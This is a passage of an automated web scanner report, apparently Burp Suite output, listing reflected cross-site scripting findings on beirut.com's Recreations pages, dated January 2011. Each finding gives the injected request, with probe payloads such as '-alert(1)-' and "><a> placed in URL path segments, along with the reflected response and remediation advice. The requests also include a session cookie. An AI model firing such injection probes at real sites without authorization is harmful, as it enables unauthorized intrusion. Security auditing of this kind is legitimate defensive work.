Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:20:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreationsf1b1e"><a>b28c59e248f">
...[SNIP]...

4.675. http://www.beirut.com/Recreations/Golf-Clubs/926389688 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Golf-Clubs/926389688

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adbf5'-alert(1)-'d1930d19a84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Golf-Clubsadbf5'-alert(1)-'d1930d19a84/926389688 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:34:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations/Golf-Clubsadbf5'-alert(1)-'d1930d19a84';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.676. http://www.beirut.com/Recreations/Horseback-Riding/6888394074 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Horseback-Riding/6888394074

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1511'-alert(1)-'cf628a96a28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreationsf1511'-alert(1)-'cf628a96a28/Horseback-Riding/6888394074 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:24:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreationsf1511'-alert(1)-'cf628a96a28/Horseback-Riding';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.677. http://www.beirut.com/Recreations/Horseback-Riding/6888394074 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Horseback-Riding/6888394074

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68b1e"><a>d058ff3c489 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations68b1e"><a>d058ff3c489/Horseback-Riding/6888394074 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:15:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations68b1e"><a>d058ff3c489">
...[SNIP]...

4.678. http://www.beirut.com/Recreations/Horseback-Riding/6888394074 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Horseback-Riding/6888394074

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 196be'-alert(1)-'66f2ac5e128 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Horseback-Riding196be'-alert(1)-'66f2ac5e128/6888394074 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:31:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Recreations/Horseback-Riding196be'-alert(1)-'66f2ac5e128';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.679. http://www.beirut.com/Recreations/Play-Centers/83897013 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Play-Centers/83897013

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abe6"><a>5ba29b42c39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations9abe6"><a>5ba29b42c39/Play-Centers/83897013 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:19:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations9abe6"><a>5ba29b42c39">
...[SNIP]...

4.680. http://www.beirut.com/Recreations/Play-Centers/83897013 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Play-Centers/83897013

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 113d0'-alert(1)-'d9ebdf230b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations113d0'-alert(1)-'d9ebdf230b6/Play-Centers/83897013 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:24:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Recreations113d0'-alert(1)-'d9ebdf230b6/Play-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.681. http://www.beirut.com/Recreations/Play-Centers/83897013 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Play-Centers/83897013

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0296'-alert(1)-'5c69626aca9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Play-Centersd0296'-alert(1)-'5c69626aca9/83897013 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:31:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreations/Play-Centersd0296'-alert(1)-'5c69626aca9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.682. http://www.beirut.com/Recreations/Pool-Halls/2561106634 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Pool-Halls/2561106634

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74193'-alert(1)-'57ee2bbc39d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations74193'-alert(1)-'57ee2bbc39d/Pool-Halls/2561106634 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:28:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Recreations74193'-alert(1)-'57ee2bbc39d/Pool-Halls';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.683. http://www.beirut.com/Recreations/Pool-Halls/2561106634 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Pool-Halls/2561106634

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebbcf"><a>a25aa467a08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreationsebbcf"><a>a25aa467a08/Pool-Halls/2561106634 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:21:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreationsebbcf"><a>a25aa467a08">
...[SNIP]...

4.684. http://www.beirut.com/Recreations/Pool-Halls/2561106634 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Pool-Halls/2561106634

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d41ed'-alert(1)-'16e8bc12987 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Pool-Hallsd41ed'-alert(1)-'16e8bc12987/2561106634 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:32:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Recreations/Pool-Hallsd41ed'-alert(1)-'16e8bc12987';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.685. http://www.beirut.com/Recreations/Public-Beaches/075078389 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Public-Beaches/075078389

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1139b"><a>464e78fe36b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations1139b"><a>464e78fe36b/Public-Beaches/075078389 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:17:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations1139b"><a>464e78fe36b">
...[SNIP]...

4.686. http://www.beirut.com/Recreations/Public-Beaches/075078389 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Public-Beaches/075078389

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72374'-alert(1)-'8cc1e2889f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations72374'-alert(1)-'8cc1e2889f7/Public-Beaches/075078389 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:24:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreations72374'-alert(1)-'8cc1e2889f7/Public-Beaches';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.687. http://www.beirut.com/Recreations/Public-Beaches/075078389 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Public-Beaches/075078389

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8bf2'-alert(1)-'11660c0128f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Public-Beachesf8bf2'-alert(1)-'11660c0128f/075078389 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:27:59 GMT
